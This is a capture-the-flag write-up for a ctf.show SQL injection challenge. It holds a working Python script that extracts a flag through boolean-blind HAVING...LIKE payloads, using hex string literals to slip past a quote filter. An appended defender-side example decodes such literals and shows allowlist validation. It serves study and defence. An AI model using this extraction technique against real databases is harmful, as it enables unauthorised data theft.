This challenge exercises the following knowledge point: WHERE, HAVING and ON conditional clauses in SQL injection.
Script
import requests, re

# Character set searched at each position of the flag (dash, digits, lowercase letters)
dic = "-1234567890abcdefghijklmnopqrstuvwxyz"
url = "http://77f67f80-314c-4fcb-aeee-047f4aa6f35f.challenge.ctf.show/select-waf.php"
res = []  # flag characters recovered so far
# Sent as the tableName parameter; {} is replaced by a 0x hex literal, so no quotes are needed
post_tem = "ctfshow_user group by pass HAVING pass like {}"

def str_to_hex(s):
    # Encode a string as the body of a MySQL hex literal (two hex digits per ASCII character)
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])

for a in range(1, 50):
    temp = len(res)
    for i in dic:
        res += i
        post = {"tableName": post_tem.format("0x" + str_to_hex("ctfshow{" + "".join(res) + "%}"))}
        print(post)
        r = requests.post(url=url, data=post)
        # The page prints $user_count = 1 when the LIKE pattern matches the stored value
        if re.findall(r"\$user_count = 1", r.text):
            break
        res.pop(-1)
    # No candidate character extended the match, so the flag is complete
    if temp == len(res):
        break
print("ctfshow{" + "".join(res) + "}")
Note that this challenge filters single and double quotes, so a hexadecimal string literal is needed to get around the filter; a hexadecimal string literal does not need to be wrapped in single or double quotes.
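As an added example from the defender's side (not part of the writeup), the following Python shows why a quote-only filter does not stop this payload: a MySQL `0x` literal decodes to the same string the quotes would have carried, and the real fix is an allowlist for the `tableName` parameter. The allowlist contents and the sample input are constructed assumptions modelled on the payload above.

```python
import re

# Assumed allowlist for the tableName parameter (constructed; it holds only
# the table named in the writeup).
ALLOWED_TABLES = {"ctfshow_user"}

# Constructed sample shaped like the writeup's payload: a HAVING ... LIKE
# probe whose pattern is the hex literal for "ctfshow{%}" and contains no quotes.
SAMPLE_INPUT = "ctfshow_user group by pass HAVING pass like 0x63746673686f777b257d"

def quote_filter_passes(value):
    """Mimic the weak filter the writeup describes: only quotes are rejected."""
    return "'" not in value and '"' not in value

def decode_hex_literals(value):
    """Decode every MySQL 0x hex literal in the input so a reviewer can see
    which string it smuggles past the quote filter."""
    decoded = []
    for match in re.finditer(r"\b0x([0-9a-fA-F]+)", value):
        digits = match.group(1)
        if len(digits) % 2:          # MySQL left-pads odd-length literals
            digits = "0" + digits
        decoded.append(bytes.fromhex(digits).decode("utf-8", "replace"))
    return decoded

def looks_like_blind_probe(value):
    """Flag the HAVING ... LIKE <hex literal> shape used for boolean-blind
    extraction; useful for logging and alerting, not as the only control."""
    lowered = value.lower()
    return ("having" in lowered and " like " in lowered
            and bool(decode_hex_literals(value)))

def table_name_is_valid(value):
    """The actual mitigation: compare the parameter against an allowlist
    instead of scrubbing characters out of a value concatenated into SQL."""
    return value in ALLOWED_TABLES

def audit(value):
    """Summarise what each check says about one tableName value."""
    return {
        "passes_quote_filter": quote_filter_passes(value),
        "hex_literals": decode_hex_literals(value),
        "blind_probe": looks_like_blind_probe(value),
        "allowlisted": table_name_is_valid(value),
    }

if __name__ == "__main__":
    print(audit(SAMPLE_INPUT))   # passes the quote filter, fails the allowlist
    print(audit("ctfshow_user"))
```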